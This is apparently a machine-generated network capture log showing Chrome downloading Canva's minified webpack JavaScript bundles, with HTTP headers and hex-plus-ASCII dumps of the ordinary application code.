                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC364INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 42 6e 4c 6b 58 72 34 25 32 42 64 48 53 34 32 6c 44 78 34 64 7a 4b 63 42 52 71 50 7a 63 25 32 42 45 62 48 73 6c 76 6d 57 52 59 36 33 63 53 4d 6b 52 4b 4c 51 31 6f 34 73 47 35 6a 34 75 48 34 52 49 64 6a 78 54 35 71 6b 56 6d 72 48 6e 71 62 51 69 65 4d 37 76 54 6f 30 72 31 54 6c 38 71 4b 56 6f 4b 56 42 45 43 54 68 4a 43 58 44 38 6d 43 7a 73 59 46 4f 46 25 32 46 6e 6e 47 58 79 73 69 44 25 32 46 59 74 66 51 4b 41 57 49 48 36 72 65 45 61 34 46 7a 75 51 67 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BnLkXr4%2BdHS42lDx4dzKcBRqPzc%2BEbHslvmWRY63cSMkRKLQ1o4sG5j4uH4RIdjxT5qkVmrHnqbQieM7vTo0r1Tl8qKVoKVBECThJCXD8mCzsYFOF%2FnnGXysiD%2FYtfQKAWIH6reEa4FzuQg%3D"}],"group":"cf-nel","m
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1225INData Raw: 3b 2f 2f 20 5f 5f 46 49 4c 45 5f 43 4f 4e 54 45 4e 54 5f 46 4f 52 5f 5f 3a 36 61 64 66 39 38 31 64 61 66 30 31 36 33 32 30 2e 6a 73 0a 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 39 39 31 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 35 35 32 38 35 39 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f
                                                                                                                                                                                                                                                                    Data Ascii: ;// __FILE_CONTENT_FOR__:6adf981daf016320.js(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1991],{/***/ 552859:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 6e 5f 73 65 73 73 69 6f 6e 5f 69 64 3a 61 2e 6a 4f 62 2c 6e 61 76 69 67 61 74 69 6f 6e 5f 63 6f 72 72 65 6c 61 74 69 6f 6e 5f 69 64 3a 61 2e 67 74 2c 69 73 5f 64 65 73 69 67 6e 5f 6f 77 6e 65 72 3a 61 2e 50 65 61 2c 64 65 73 69 67 6e 5f 6f 77 6e 65 72 5f 75 73 65 72 5f 69 64 3a 61 2e 4b 31 2c 61 63 63 65 73 73 5f 72 6f 6c 65 3a 61 2e 57 64 2c 0a 76 69 65 77 5f 6d 6f 64 65 3a 61 2e 58 5a 2c 65 64 69 74 5f 6d 6f 64 65 3a 61 2e 70 50 62 2c 65 6d 62 65 64 64 65 64 5f 70 61 67 65 5f 73 6f 75 72 63 65 3a 61 2e 79 50 62 2c 70 6f 73 69 74 69 6f 6e 69 6e 67 3a 61 2e 62 66 2c 69 73 5f 70 72 6f 70 6f 72 74 69 6f 6e 61 6c 5f 73 63 65 6e 65 73 3a 61 2e 56 55 62 2c 73 65 6c 65 63 74 69 6f 6e 5f 74 79 70 65 3a 61 2e 6f 32 62 2c 73 65 6c 65 63 74 69 6f 6e 5f 63 6f 75 6e
                                                                                                                                                                                                                                                                    Data Ascii: n_session_id:a.jOb,navigation_correlation_id:a.gt,is_design_owner:a.Pea,design_owner_user_id:a.K1,access_role:a.Wd,view_mode:a.XZ,edit_mode:a.pPb,embedded_page_source:a.yPb,positioning:a.bf,is_proportional_scenes:a.VUb,selection_type:a.o2b,selection_coun
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 73 57 69 74 68 28 22 2f 64 65 73 69 67 6e 2f 22 29 29 72 65 74 75 72 6e 20 61 3b 63 6f 6e 73 74 20 62 3d 61 2e 73 70 6c 69 74 28 22 2f 22 29 3b 69 66 28 34 3e 62 2e 6c 65 6e 67 74 68 7c 7c 44 70 61 2e 68 61 73 28 62 5b 33 5d 29 29 72 65 74 75 72 6e 20 61 3b 62 5b 33 5d 3d 22 2a 2a 2a 2a 2a 22 3b 72 65 74 75 72 6e 20 62 2e 6a 6f 69 6e 28 22 2f 22 29 7d 3b 5f 5f 63 2e 41 70 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 7c 7c 30 3d 3d 3d 61 2e 6c 65 6e 67 74 68 7c 7c 21 61 2e 73 74 61 72 74 73 57 69 74 68 28 22 3f 22 29 29 72 65 74 75 72 6e 20 61 3b 61 3d 61 2e 73 6c 69 63 65 28 61 2e 69 6e 64 65 78 4f 66 28 22 3f 22 29 2b 31 29 2e 73 70 6c 69 74 28 22 26 22 29 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 5b 62 5d 3d 62 2e 73 70 6c
                                                                                                                                                                                                                                                                    Data Ascii: sWith("/design/"))return a;const b=a.split("/");if(4>b.length||Dpa.has(b[3]))return a;b[3]="*****";return b.join("/")};__c.Apa=function(a){if(!a||0===a.length||!a.startsWith("?"))return a;a=a.slice(a.indexOf("?")+1).split("&").filter(function(b){[b]=b.spl
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 68 28 7b 73 6f 75 72 63 65 3a 61 2e 73 6f 75 72 63 65 2c 72 65 73 6f 75 72 63 65 5f 69 64 3a 61 2e 74 59 61 2c 73 75 63 63 65 73 73 3a 61 2e 73 75 63 63 65 73 73 2c 72 65 73 6f 75 72 63 65 5f 74 79 70 65 3a 61 2e 72 65 73 6f 75 72 63 65 54 79 70 65 2c 76 65 72 73 69 6f 6e 3a 61 2e 76 65 72 73 69 6f 6e 2c 75 72 6c 3a 5f 5f 63 2e 43 70 61 28 61 2e 75 72 6c 29 2c 77 61 74 65 72 6d 61 72 6b 65 64 3a 61 2e 72 61 2c 73 70 72 69 74 65 73 68 65 65 74 3a 61 2e 61 65 2c 68 65 69 67 68 74 3a 61 2e 68 65 69 67 68 74 2c 77 69 64 74 68 3a 61 2e 77 69 64 74 68 2c 71 75 61 6c 69 74 79 3a 61 2e 71 75 61 6c 69 74 79 2c 72 65 73 74 72 69 63 74 65 64 5f 61 63 63 65 73 73 3a 61 2e 5a 6e 2c 66 69 6c 65 5f 73 69 7a 65 3a 61 2e 66 69 6c 65 53 69 7a 65 2c 66 61 69 6c 75 72 65 5f
                                                                                                                                                                                                                                                                    Data Ascii: h({source:a.source,resource_id:a.tYa,success:a.success,resource_type:a.resourceType,version:a.version,url:__c.Cpa(a.url),watermarked:a.ra,spritesheet:a.ae,height:a.height,width:a.width,quality:a.quality,restricted_access:a.Zn,file_size:a.fileSize,failure_
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 7c 7c 20 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 5f 63 29 20 7b 76 61 72 20 76 6a 3b 76 61 72 20 46 73 61 2c 4e 73 61 2c 4f 73 61 2c 50 73 61 2c 51 73 61 3b 5f 5f 63 2e 73 6a 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 72 65 70 6c 61 63 65 28 5f 5f 63 2e 70 71 61 2c 62 3d 3e 5f 5f 63 2e 71 69 5b 62 5d 29 7d 3b 5f 5f 63 2e 74 6a 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 28 6e 75 6c 6c 3d 3d 3d 61 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 30 3a 61 2e 72 65 71 75 65 73 74 49 64 29 3f 5f 5f 63 2e 59 68 28 22 4e 66 71 2f 66 41 22 2c 5b 5f 5f 63 2e 73 6a 28 61 2e 72 65 71 75 65 73 74 49 64 29 5d 29 3a 5f 5f 63 2e 4f 28 22 37 64 56 38 6a 67 22 29 7d 3b 5f 5f 63 2e 45 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72
                                                                                                                                                                                                                                                                    Data Ascii: || {};(function(__c) {var vj;var Fsa,Nsa,Osa,Psa,Qsa;__c.sj=function(a){return a.replace(__c.pqa,b=>__c.qi[b])};__c.tj=function(a){return(null===a||void 0===a?0:a.requestId)?__c.Yh("Nfq/fA",[__c.sj(a.requestId)]):__c.O("7dV8jg")};__c.Esa=function(a){retur
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 63 68 69 6c 64 72 65 6e 3a 76 6a 28 5f 5f 63 2e 79 6a 2c 7b 73 68 61 70 65 3a 22 74 65 78 74 52 65 63 74 61 6e 67 6c 65 22 2c 69 6e 64 65 78 3a 63 7d 29 7d 29 7d 3b 0a 4f 73 61 3d 7b 72 61 64 69 75 73 45 6c 65 6d 65 6e 74 3a 22 38 70 78 22 2c 72 61 64 69 75 73 45 6c 65 6d 65 6e 74 52 6f 75 6e 64 3a 22 39 39 39 39 70 78 22 2c 63 6f 6c 6f 72 54 79 70 6f 67 72 61 70 68 79 50 72 69 6d 61 72 79 3a 22 76 61 72 28 2d 2d 56 4e 58 70 53 77 29 22 2c 74 68 65 6d 65 44 61 72 6b 3a 22 3a 67 6c 6f 62 61 6c 28 2e 64 61 72 6b 29 22 2c 74 68 65 6d 65 4c 69 67 68 74 3a 22 3a 67 6c 6f 62 61 6c 28 2e 6c 69 67 68 74 29 22 2c 66 6f 6e 74 53 69 7a 65 45 78 74 72 61 53 6d 61 6c 6c 3a 22 63 61 6c 63 28 76 61 72 28 2d 2d 77 51 77 56 47 77 2c 20 30 2e 31 72 65 6d 29 2a 31 31 29 22
                                                                                                                                                                                                                                                                    Data Ascii: children:vj(__c.yj,{shape:"textRectangle",index:c})})};Osa={radiusElement:"8px",radiusElementRound:"9999px",colorTypographyPrimary:"var(--VNXpSw)",themeDark:":global(.dark)",themeLight:":global(.light)",fontSizeExtraSmall:"calc(var(--wQwVGw, 0.1rem)*11)"
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 76 61 6c 75 65 3b 61 2e 67 65 74 45 72 72 6f 72 3d 64 3d 3e 64 2e 65 72 72 6f 72 3b 61 2e 46 46 62 3d 28 29 3d 3e 28 7b 6b 69 6e 64 3a 30 7d 29 3b 61 2e 78 47 61 3d 28 29 3d 3e 28 7b 6b 69 6e 64 3a 31 7d 29 3b 61 2e 59 72 3d 64 3d 3e 28 7b 6b 69 6e 64 3a 32 2c 76 61 6c 75 65 3a 64 7d 29 3b 61 2e 71 62 3d 64 3d 3e 28 7b 6b 69 6e 64 3a 33 2c 65 72 72 6f 72 3a 64 7d 29 3b 76 61 72 20 62 3d 61 2e 6d 61 70 3d 28 64 2c 65 29 3d 3e 7b 73 77 69 74 63 68 28 64 2e 6b 69 6e 64 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 65 2e 69 6e 69 74 69 61 6c 28 29 3b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 20 65 2e 6c 6f 61 64 69 6e 67 28 29 3b 63 61 73 65 20 32 3a 62 72 65 61 6b 3b 63 61 73 65 20 33 3a 72 65 74 75 72 6e 20 65 2e 72 65 6a 65 63 74 65 64 28 64 2e 65 72 72 6f
                                                                                                                                                                                                                                                                    Data Ascii: value;a.getError=d=>d.error;a.FFb=()=>({kind:0});a.xGa=()=>({kind:1});a.Yr=d=>({kind:2,value:d});a.qb=d=>({kind:3,error:d});var b=a.map=(d,e)=>{switch(d.kind){case 0:return e.initial();case 1:return e.loading();case 2:break;case 3:return e.rejected(d.erro
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 5f 50 68 52 53 51 22 2c 7b 41 4f 45 73 6a 51 3a 22 76 65 72 74 69 63 61 6c 22 3d 3d 3d 61 7d 29 7d 29 3b 41 6a 28 28 7b 69 64 3a 61 2c 74 65 78 74 3a 62 2c 63 68 69 6c 64 72 65 6e 3a 63 7d 29 3d 3e 51 73 61 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 5f 31 5a 46 67 71 41 22 2c 69 64 3a 61 2c 63 68 69 6c 64 72 65 6e 3a 5b 76 6a 28 22 73 70 61 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 76 74 51 65 66 67 20 5f 35 4e 48 58 54 41 22 2c 63 68 69 6c 64 72 65 6e 3a 62 7d 29 2c 63 5d 7d 29 29 3b 76 61 72 20 47 73 61 3d 22 64 49 48 5f 46 51 20 7a 32 6f 5a 46 77 22 2c 48 73 61 3d 22 69 44 79 79 79 41 20 77 4c 36 76 71 51 22 2c 49 73 61 3d 22 79 62 79 65 67 67 20 5f 35 4a 67 53 49 51 22 2c 4a 73 61 3d 22 68 71 69 4d 74 77 20 5f 36 70 45 5f 64 51 22 2c
                                                                                                                                                                                                                                                                    Data Ascii: _PhRSQ",{AOEsjQ:"vertical"===a})});Aj(({id:a,text:b,children:c})=>Qsa("div",{className:"_1ZFgqA",id:a,children:[vj("span",{className:"vtQefg _5NHXTA",children:b}),c]}));var Gsa="dIH_FQ z2oZFw",Hsa="iDyyyA wL6vqQ",Isa="ybyegg _5JgSIQ",Jsa="hqiMtw _6pE_dQ",
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 2d 2e 33 2d 2e 36 2d 2e 32 2d 2e 31 2d 2e 35 20 30 2d 2e 36 2e 33 6c 2d 2e 36 20 31 2e 38 48 38 63 2d 32 2e 34 20 30 2d 34 2e 36 20 31 2e 31 2d 36 2e 36 20 33 2e 34 2d 2e 35 2e 35 2d 2e 35 20 31 2e 33 20 30 20 31 2e 38 20 31 2e 33 20 31 2e 36 20 32 2e 38 20 32 2e 36 20 34 2e 34 20 33 2e 31 6c 2d 2e 34 20 31 2e 34 63 2d 2e 31 2e 32 20 30 20 2e 35 2e 33 2e 36 2e 33 2e 31 2e 35 2d 2e 31 2e 36 2d 2e 34 6c 2e 35 2d 31 2e 34 2e 33 2d 2e 39 2e 31 2d 2e 34 7a 6d 2d 31 2e 31 2e 31 63 2d 31 2e 34 2d 2e 34 2d 32 2e 37 2d 31 2e 33 2d 34 2d 32 2e 38 61 2e 33 2e 33 20 30 20 30 20 31 20 30 2d 2e 34 43 34 20 35 2e 37 20 35 2e 39 20 34 2e 37 20 38 20 34 2e 37 6c 2d 2e 32 2e 36 43 36 2e 34 20 35 2e 34 20 35 2e 33 20 36 2e 36 20 35 2e 33 20 38 63 30 20 2e 39 2e 34 20 31 2e
                                                                                                                                                                                                                                                                    Data Ascii: -.3-.6-.2-.1-.5 0-.6.3l-.6 1.8H8c-2.4 0-4.6 1.1-6.6 3.4-.5.5-.5 1.3 0 1.8 1.3 1.6 2.8 2.6 4.4 3.1l-.4 1.4c-.1.2 0 .5.3.6.3.1.5-.1.6-.4l.5-1.4.3-.9.1-.4zm-1.1.1c-1.4-.4-2.7-1.3-4-2.8a.3.3 0 0 1 0-.4C4 5.7 5.9 4.7 8 4.7l-.2.6C6.4 5.4 5.3 6.6 5.3 8c0 .9.4 1.


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    51192.168.2.1249774104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC979OUTGET /chunk-batch/d2858d877c79e696.js+6df21c0ad726f56e.vendor.js+d9c3325fa20c5077.js+1af3845752268f2b.js+73112b4e8057cf9b.strings.js+e95df303e00e9086.js+36a39abacef2de2d.js+51a65bea267f0a65.js+4270be5a3621855a.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: chunk-composing.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1149INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:39 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 363712
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59510bf8ae0ca5-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49979
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:25 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:23 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    Timing-Allow-Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: +HayqgXCcSs4RHAH8yGibc1nnHXgI5M0Q/ur/i42GFFNkhoc78eqxmq2jIOno/71CBM97tZPvZY=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8GZKXDG6V4SK65
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: rLfmBkhqhiVtIBleJLRlGivQLOzaVdmK
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC362INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 54 65 69 25 32 42 49 49 51 61 32 6d 4a 33 36 6f 6c 57 65 6b 37 37 4b 6e 56 5a 74 35 47 4e 53 7a 76 43 4e 4f 48 58 70 42 5a 25 32 46 42 42 47 64 67 53 31 67 56 52 37 7a 76 4a 4d 75 58 50 61 6e 52 4d 30 38 6f 7a 68 34 4a 34 41 66 75 70 34 4f 6f 4d 58 6f 31 78 53 7a 33 43 39 54 34 65 57 5a 6d 6b 6d 69 64 36 38 59 25 32 46 39 68 4f 34 54 55 32 74 79 67 46 71 37 6d 7a 50 41 4b 47 63 66 4e 37 58 4a 37 47 30 6d 54 71 78 67 64 31 65 76 62 32 32 67 77 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tei%2BIIQa2mJ36olWek77KnVZt5GNSzvCNOHXpBZ%2FBBGdgS1gVR7zvJMuXPanRM08ozh4J4Afup4OoMXo1xSz3C9T4eWZmkmid68Y%2F9hO4TU2tygFq7mzPAKGcfN7XJ7G0mTqxgd1evb22gw%3D"}],"group":"cf-nel","max
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1227INData Raw: 3b 2f 2f 20 5f 5f 46 49 4c 45 5f 43 4f 4e 54 45 4e 54 5f 46 4f 52 5f 5f 3a 64 32 38 35 38 64 38 37 37 63 37 39 65 36 39 36 2e 6a 73 0a 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 37 39 30 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 32 32 38 30 34 33 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f
                                                                                                                                                                                                                                                                    Data Ascii: ;// __FILE_CONTENT_FOR__:d2858d877c79e696.js(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[3790],{/***/ 228043:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 72 6f 72 22 2c 6e 65 77 20 4d 61 70 28 5b 5b 22 65 72 72 6f 72 5f 74 79 70 65 22 2c 22 64 79 6e 61 6d 69 63 5f 69 6d 70 6f 72 74 22 5d 5d 29 29 3b 74 68 72 6f 77 20 67 3b 7d 29 5d 29 3b 0a 61 3d 66 2e 64 65 73 65 72 69 61 6c 69 7a 65 28 65 29 3b 63 26 26 63 2e 65 6e 64 28 29 3b 72 65 74 75 72 6e 20 61 7d 61 73 79 6e 63 20 66 5a 61 28 61 29 7b 76 61 72 20 62 3d 62 7a 28 5b 63 59 2c 22 75 73 65 72 73 22 2c 22 70 61 73 73 77 6f 72 64 72 65 73 65 74 22 5d 29 3b 5f 5f 63 2e 61 7a 28 62 2c 7b 63 6f 64 65 3a 5f 5f 63 2e 41 28 61 2e 63 6f 64 65 2c 22 53 65 6e 64 50 61 73 73 77 6f 72 64 52 65 73 65 74 43 6f 64 65 41 70 69 52 65 71 75 65 73 74 23 63 6f 64 65 20 72 65 71 75 69 72 65 64 22 29 2c 61 63 74 69 6f 6e 3a 61 2e 61 63 74 69 6f 6e 7d 29 3b 62 3d 64 7a 28 62
                                                                                                                                                                                                                                                                    Data Ascii: ror",new Map([["error_type","dynamic_import"]]));throw g;})]);a=f.deserialize(e);c&&c.end();return a}async fZa(a){var b=bz([cY,"users","passwordreset"]);__c.az(b,{code:__c.A(a.code,"SendPasswordResetCodeApiRequest#code required"),action:a.action});b=dz(b
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 73 65 72 69 61 6c 69 7a 65 28 63 29 7d 61 73 79 6e 63 20 41 59 28 61 29 7b 76 61 72 20 62 3d 62 7a 28 5b 63 59 2c 22 75 73 65 72 73 22 2c 22 70 61 73 73 77 6f 72 64 72 65 73 65 74 22 5d 29 3b 5f 5f 63 2e 61 7a 28 62 2c 7b 63 6f 64 65 3a 5f 5f 63 2e 41 28 61 2e 63 6f 64 65 2c 22 52 65 73 65 74 50 61 73 73 77 6f 72 64 41 70 69 52 65 71 75 65 73 74 23 63 6f 64 65 20 72 65 71 75 69 72 65 64 22 29 2c 61 63 74 69 6f 6e 3a 61 2e 61 63 74 69 6f 6e 7d 29 3b 62 3d 64 7a 28 62 29 3b 63 6f 6e 73 74 20 5b 63 2c 7b 58 35 61 3a 64 7d 5d 3d 61 77 61 69 74 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 5b 74 68 69 73 2e 65 62 2e 70 6f 73 74 28 62 2c 0a 5f 5f 63 2e 6a 7a 2e 73 65 72 69 61 6c 69 7a 65 28 61 2e 62 6f 64 79 29 2c 7b 5a 63 3a 22 72 65 73 65 74 70 61 73 73 77 6f 72 64
                                                                                                                                                                                                                                                                    Data Ascii: serialize(c)}async AY(a){var b=bz([cY,"users","passwordreset"]);__c.az(b,{code:__c.A(a.code,"ResetPasswordApiRequest#code required"),action:a.action});b=dz(b);const [c,{X5a:d}]=await Promise.all([this.eb.post(b,__c.jz.serialize(a.body),{Zc:"resetpassword
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 28 61 29 7b 74 68 69 73 2e 65 62 3d 61 3b 74 68 69 73 2e 6e 61 3d 76 6f 69 64 20 30 7d 7d 3b 63 59 3d 22 70 72 6f 66 69 6c 65 22 3b 0a 7d 29 2e 63 61 6c 6c 28 73 65 6c 66 2c 20 73 65 6c 66 2e 5f 34 35 66 37 38 35 33 64 63 37 36 36 30 33 37 38 61 30 33 38 39 35 32 62 35 33 63 30 39 35 33 65 29 3b 7d 0a 0a 7d 5d 29 0a 3b 2f 2f 20 5f 5f 46 49 4c 45 5f 43 4f 4e 54 45 4e 54 5f 46 4f 52 5f 5f 3a 36 64 66 32 31 63 30 61 64 37 32 36 66 35 36 65 2e 76 65 6e 64 6f 72 2e 6a 73 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 36 64 66 32 31 63 30 61 64 37 32 36 66 35 36 65 2e 76 65 6e 64 6f 72 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75
                                                                                                                                                                                                                                                                    Data Ascii: (a){this.eb=a;this.na=void 0}};cY="profile";}).call(self, self._45f7853dc7660378a038952b53c0953e);}}]);// __FILE_CONTENT_FOR__:6df21c0ad726f56e.vendor.js/*! For license information please see 6df21c0ad726f56e.vendor.js.LICENSE.txt */(self.webpackChu
